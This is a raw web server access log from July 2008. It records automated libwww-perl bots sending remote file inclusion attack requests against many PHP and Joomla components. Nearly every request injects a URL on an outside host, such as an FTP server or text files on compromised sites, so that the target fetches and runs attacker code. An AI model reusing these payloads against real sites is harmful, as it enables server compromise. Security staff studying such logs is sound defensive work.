87.106.18.76 - - [12/Jul/2008:21:36:31 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:21:36:36 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
66.249.67.236 - - [12/Jul/2008:21:37:34 -0500] "GET /logs/access_log.1214352000 HTTP/1.1" 200 400335 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.229.106.43 - - [12/Jul/2008:21:38:45 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.229.106.43 - - [12/Jul/2008:21:38:45 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
63.245.229.82 - - [12/Jul/2008:21:45:47 -0500] "GET /logs/becommunity/community/index.php?pageurl=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
63.245.229.82 - - [12/Jul/2008:21:45:47 -0500] "GET /becommunity/community/index.php?pageurl=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:21:47:27 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:21:47:32 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:21:47:38 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:21:47:43 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
194.30.128.45 - - [12/Jul/2008:21:52:00 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
194.30.128.45 - - [12/Jul/2008:21:52:00 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
89.188.110.128 - - [12/Jul/2008:21:53:03 -0500] "GET /logs//include.php?path[docroot]=http://www.5678cheer.com/help/ioncube/sql.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
89.188.110.128 - - [12/Jul/2008:21:53:04 -0500] "GET //include.php?path[docroot]=http://www.5678cheer.com/help/ioncube/sql.txt? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
203.116.91.54 - - [12/Jul/2008:21:54:38 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
203.116.91.54 - - [12/Jul/2008:21:54:38 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
203.116.91.54 - - [12/Jul/2008:21:54:38 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
203.116.91.54 - - [12/Jul/2008:21:54:38 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
80.190.131.43 - - [12/Jul/2008:21:57:55 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.69"
80.190.131.43 - - [12/Jul/2008:21:57:55 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.69"
62.210.113.58 - - [12/Jul/2008:22:01:56 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
62.210.113.58 - - [12/Jul/2008:22:01:56 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
62.210.113.58 - - [12/Jul/2008:22:01:56 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
62.210.113.58 - - [12/Jul/2008:22:01:56 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
77.221.130.16 - - [12/Jul/2008:22:03:13 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sujianto.com/load.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
77.221.130.16 - - [12/Jul/2008:22:03:14 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sujianto.com/load.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
194.151.202.2 - - [12/Jul/2008:22:03:29 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sujianto.com/load.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
194.151.202.2 - - [12/Jul/2008:22:03:29 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sujianto.com/load.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
194.151.202.2 - - [12/Jul/2008:22:03:47 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sujianto.com/load.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
194.151.202.2 - - [12/Jul/2008:22:03:47 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://sujianto.com/load.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:22:04:17 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:22:04:28 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:22:04:34 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:22:04:39 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
63.245.229.82 - - [12/Jul/2008:22:06:25 -0500] "GET /logs/becommunity/community/index.php?pageurl=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
63.245.229.82 - - [12/Jul/2008:22:06:25 -0500] "GET /becommunity/community/index.php?pageurl=http://www.cyos.co.kr/gallery/readme.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
203.116.91.54 - - [12/Jul/2008:22:07:26 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
203.116.91.54 - - [12/Jul/2008:22:07:26 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
203.116.91.54 - - [12/Jul/2008:22:07:29 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
203.116.91.54 - - [12/Jul/2008:22:07:30 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
213.219.151.102 - - [12/Jul/2008:22:14:55 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 200 91134 "-""libwww-perl/5.805"
213.219.151.102 - - [12/Jul/2008:22:14:55 -0500] "GET //?path%5Bdocroot%5D=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
87.229.106.43 - - [12/Jul/2008:22:19:30 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.229.106.43 - - [12/Jul/2008:22:19:32 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.61.45.178 - - [12/Jul/2008:22:20:25 -0500] "GET /logs/scanhttp://kila-staerkestrasse.de/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.810"
69.61.45.178 - - [12/Jul/2008:22:20:25 -0500] "GET /scanhttp://kila-staerkestrasse.de/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
69.61.45.178 - - [12/Jul/2008:22:20:27 -0500] "GET /logs/scanhttp://kila-staerkestrasse.de/id.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.810"
69.61.45.178 - - [12/Jul/2008:22:20:27 -0500] "GET /scanhttp://kila-staerkestrasse.de/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
205.234.186.154 - - [12/Jul/2008:22:20:55 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
205.234.186.154 - - [12/Jul/2008:22:20:55 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
87.106.18.76 - - [12/Jul/2008:22:24:23 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:22:24:28 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:22:24:34 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
87.106.18.76 - - [12/Jul/2008:22:24:34 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
87.229.106.43 - - [12/Jul/2008:22:27:30 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.229.106.43 - - [12/Jul/2008:22:27:31 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.190.131.43 - - [12/Jul/2008:22:28:36 -0500] "GET /logs/access_log.1181952000//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.69"
80.190.131.43 - - [12/Jul/2008:22:28:36 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.69"
80.190.131.43 - - [12/Jul/2008:22:28:36 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.69"
64.18.142.194 - - [12/Jul/2008:22:28:46 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
64.18.142.194 - - [12/Jul/2008:22:28:46 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
80.190.131.43 - - [12/Jul/2008:22:28:48 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.69"
87.229.106.43 - - [12/Jul/2008:22:29:25 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.229.106.43 - - [12/Jul/2008:22:29:26 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.74.196.90 - - [12/Jul/2008:22:36:14 -0500] "GET /logs//?path[docroot]=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 200 91134 "-""libwww-perl/5.811"
77.74.196.90 - - [12/Jul/2008:22:36:16 -0500] "GET //?path[docroot]=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
193.233.85.46 - - [12/Jul/2008:22:41:30 -0500] "GET /logs//header.php?base_folder=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
193.233.85.46 - - [12/Jul/2008:22:41:31 -0500] "GET //header.php?base_folder=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.229.106.43 - - [12/Jul/2008:22:41:35 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.229.106.43 - - [12/Jul/2008:22:41:36 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.47.205.18 - - [12/Jul/2008:22:43:46 -0500] "GET //header.php?base_folder=http://lasekmu.co.cc/lase/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
74.6.18.252 - - [12/Jul/2008:22:44:26 -0500] "GET /logs/access_log.1164326400 HTTP/1.0" 200 141792 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.72.112.223 - - [12/Jul/2008:22:45:38 -0500] "GET /logs//header.php?base_folder=http://kecebongcrew.co.cc/on.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.800"
64.72.112.223 - - [12/Jul/2008:22:45:39 -0500] "GET //header.php?base_folder=http://kecebongcrew.co.cc/on.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.800"
216.246.1.115 - - [12/Jul/2008:22:46:20 -0500] "GET //header.php?base_folder=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
72.47.205.18 - - [12/Jul/2008:22:46:29 -0500] "GET /logs//header.php?base_folder=http://lasekmu.co.cc/lase/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
72.47.205.18 - - [12/Jul/2008:22:46:29 -0500] "GET //header.php?base_folder=http://lasekmu.co.cc/lase/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
217.151.102.50 - - [12/Jul/2008:22:46:52 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
217.151.102.50 - - [12/Jul/2008:22:46:52 -0500] "GET //Neos_Chronos/header.php?base_folder=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
206.126.229.70 - - [12/Jul/2008:22:47:42 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.brooksidefarm.com/cache/help?? HTTP/1.1" 404 369 "-""libwww-perl/5.803"
206.126.229.70 - - [12/Jul/2008:22:47:42 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.brooksidefarm.com/cache/help?? HTTP/1.1" 404 364 "-""libwww-perl/5.803"
72.37.237.58 - - [12/Jul/2008:22:48:39 -0500] "GET /logs//header.php?base_folder=http://lasekmu.co.cc/lase/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
72.37.237.58 - - [12/Jul/2008:22:48:39 -0500] "GET //header.php?base_folder=http://lasekmu.co.cc/lase/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
216.246.1.115 - - [12/Jul/2008:22:49:38 -0500] "GET /logs//header.php?base_folder=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
216.246.1.115 - - [12/Jul/2008:22:49:38 -0500] "GET //header.php?base_folder=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
193.233.85.46 - - [12/Jul/2008:22:54:23 -0500] "GET //header.php?base_folder=http://www.geocities.com/d3dy1/on.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
64.18.142.194 - - [12/Jul/2008:22:59:13 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
64.18.142.194 - - [12/Jul/2008:22:59:13 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
64.18.142.194 - - [12/Jul/2008:22:59:13 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
64.18.142.194 - - [12/Jul/2008:22:59:25 -0500] "GET /logs/access_log.1207785600//header.php?base_folder=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
64.18.142.194 - - [12/Jul/2008:22:59:25 -0500] "GET //header.php?base_folder=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.811"
64.18.142.194 - - [12/Jul/2008:22:59:25 -0500] "GET /logs//header.php?base_folder=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
83.103.23.40 - - [12/Jul/2008:22:59:50 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:22:59:51 -0500] "GET //Neos_Chronos/header.php?base_folder=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
213.219.151.102 - - [12/Jul/2008:23:01:00 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
213.219.151.102 - - [12/Jul/2008:23:01:01 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
209.216.249.151 - - [12/Jul/2008:23:02:34 -0500] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH=http://lei.crt-limousin.fr/ortl/lag/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
209.216.249.151 - - [12/Jul/2008:23:02:34 -0500] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH=http://lei.crt-limousin.fr/ortl/lag/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
82.194.70.164 - - [12/Jul/2008:23:06:19 -0500] "GET /logs/send_reminders.php?includedir=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
82.194.70.164 - - [12/Jul/2008:23:06:20 -0500] "GET /send_reminders.php?includedir=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
216.246.52.183 - - [12/Jul/2008:23:07:31 -0500] "GET /logs/send_reminders.php?includedir=http://prenotazione.motelk.com/sipi/msg/3/id.do?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
216.246.52.183 - - [12/Jul/2008:23:07:31 -0500] "GET /send_reminders.php?includedir=http://prenotazione.motelk.com/sipi/msg/3/id.do?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
82.194.70.164 - - [12/Jul/2008:23:09:20 -0500] "GET /logs/send_reminders.php?includedir=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
82.194.70.164 - - [12/Jul/2008:23:09:20 -0500] "GET /send_reminders.php?includedir=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
210.245.87.117 - - [12/Jul/2008:23:10:26 -0500] "GET /logs/Neos_Chronos/header.php?base_folder=http://stagingunlimitedinc.com/components/tmp/tmp/id.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
210.245.87.117 - - [12/Jul/2008:23:10:26 -0500] "GET /Neos_Chronos/header.php?base_folder=http://stagingunlimitedinc.com/components/tmp/tmp/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.74.196.90 - - [12/Jul/2008:23:11:21 -0500] "GET /logs/access_log.1207785600//?path[docroot]=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
77.74.196.90 - - [12/Jul/2008:23:11:21 -0500] "GET //?path[docroot]=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
77.74.196.90 - - [12/Jul/2008:23:11:22 -0500] "GET /logs//?path[docroot]=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 200 91134 "-""libwww-perl/5.811"
216.246.1.115 - - [12/Jul/2008:23:12:01 -0500] "GET /logs/access_log.1207785600//header.php?base_folder=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
216.246.1.115 - - [12/Jul/2008:23:12:01 -0500] "GET //header.php?base_folder=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
216.246.1.115 - - [12/Jul/2008:23:12:01 -0500] "GET /logs//header.php?base_folder=http://middlestreet.org.uk/Timeline/.log/on.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
213.219.151.102 - - [12/Jul/2008:23:13:25 -0500] "GET /logs/access_log.1207785600//include.php?path%5Bdocroot%5D=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
213.219.151.102 - - [12/Jul/2008:23:13:26 -0500] "GET //include.php?path%5Bdocroot%5D=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
213.219.151.102 - - [12/Jul/2008:23:13:28 -0500] "GET /logs//include.php?path%5Bdocroot%5D=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
82.194.70.164 - - [12/Jul/2008:23:21:25 -0500] "GET /logs/send_reminders.php?includedir=http://www.lisey.ca/sohoadmin/save?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
82.194.70.164 - - [12/Jul/2008:23:21:25 -0500] "GET /send_reminders.php?includedir=http://www.lisey.ca/sohoadmin/save?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
74.6.18.252 - - [12/Jul/2008:23:21:27 -0500] "GET /logs/access_log.1213488000 HTTP/1.0" 200 399432 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.219.151.102 - - [12/Jul/2008:23:23:05 -0500] "GET /logs/access_log.1207785600//?path%5Bdocroot%5D=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
213.219.151.102 - - [12/Jul/2008:23:23:06 -0500] "GET //?path%5Bdocroot%5D=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
213.219.151.102 - - [12/Jul/2008:23:23:08 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.tripi-ddl.com/video/mraneti.txt?? HTTP/1.1" 200 91134 "-""libwww-perl/5.805"
85.131.171.231 - - [12/Jul/2008:23:23:09 -0500] "GET /logs/send_reminders.php?includedir=http://?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
85.131.171.231 - - [12/Jul/2008:23:23:09 -0500] "GET /send_reminders.php?includedir=http://?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.232.68.17 - - [12/Jul/2008:23:23:10 -0500] "GET /logs/send_reminders.php?includedir=http://?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.232.68.17 - - [12/Jul/2008:23:23:10 -0500] "GET /send_reminders.php?includedir=http://?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
217.110.54.240 - - [12/Jul/2008:23:23:44 -0500] "GET /logs/home.php?action=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
217.110.54.240 - - [12/Jul/2008:23:23:45 -0500] "GET /home.php?action=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
210.245.87.117 - - [12/Jul/2008:23:23:52 -0500] "GET /Neos_Chronos/header.php?base_folder=http://stagingunlimitedinc.com/components/tmp/tmp/id.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:23:24:14 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
83.103.23.40 - - [12/Jul/2008:23:24:14 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
